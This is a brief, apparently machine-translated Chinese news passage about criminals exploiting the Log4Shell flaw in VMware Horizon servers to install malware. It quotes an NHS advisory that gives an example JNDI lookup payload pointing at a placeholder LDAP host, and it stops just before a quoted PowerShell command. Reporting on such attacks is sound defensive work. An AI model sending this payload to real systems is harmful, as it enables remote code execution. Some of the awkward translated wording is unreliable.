Patch Systems容易受到关键log4j缺陷，英国和美国官员警告

犯罪分子正在积极利用运行VMware Horizo​​ n的服务器的高度严重性log4shell漏洞，以便安装恶意软件，该软件允许他们能够完全控制受影响的系统，英国的公共资助的医疗保健系统是警告。

“攻击很可能通过类似于$ {jndi：ldap：//example.com}的log4shell有效载荷来启动，”NHS咨询说明。 “该攻击利用嵌入在VMware Horizo​​ n内的Apache Tomcat服务中的Log4shell漏洞。然后，它启动以下PowerShell命令，从WS_TOMCATService.exe生成：“